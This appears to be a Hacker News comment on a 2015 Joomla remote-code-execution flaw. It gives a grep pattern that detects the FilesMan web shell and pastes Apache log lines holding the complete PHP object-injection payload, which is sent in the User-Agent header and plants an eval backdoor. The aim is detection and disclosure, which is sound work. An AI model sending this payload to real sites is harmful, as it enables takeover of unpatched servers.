
Vulnerability Details: Joomla Remote Code Execution - ebarock
https://blog.sucuri.net/2015/12/joomla-remote-code-execution-the-details.html
======
vlsoft
In case you haven't encountered this attack, basically anything from Joomla
1.5 to 3.4.5 is vulnerable.

The payload I have seen is FilesMan, and it has a recognizable
gzinflate(base64_decode( part encoded, so this should find them: grep -rl
'\\\x65\\\x76\\\x61\\\x6C\\\x28\\\x67\\\x7A\\\x69\\\x6E\\\x66\\\x6C\\\x61\\\x74\\\x65\\\x28\\\x62\\\x61\\\x73\\\x65\\\x36\\\x34\\\x5F\\\x64\\\x65\\\x63\\\x6F\\\x64\\\x65\\\x28'
\--include=\\*.php .

The exploit goes like this (snippet from Apache2 logs, enjoy):

    
    
      XXX.XXX.XXX.XXX - - [14/Dec/2015:21:17:53 +0100] "GET / HTTP/1.1" 200 6219 "http://google.com/" "}__test|O:21:\"JDatabaseDriverMysqli\":3:{s:2:\"fc\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:8:\"feed_url\";s:60:\"eval(base64_decode($_POST[111]));JFactory::getConfig();exit;\";s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}\xf0\x9d\x8c\x86"
      XXX.XXX.XXX.XXX - - [14/Dec/2015:21:17:55 +0100] "POST / HTTP/1.1" 200 10276 "http://google.com/" "Mozilla/5.0 (X11; CrOS x86_64 6310.68.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.96 Safari/537.36"
    

They send the User-Agent header with the exploit code, which allows them to do
a subsequent POST with a better payload, although I have observed simple
phpinfo() calls too. The recent IPs I have seen are Tor exit nodes, but ymmv.

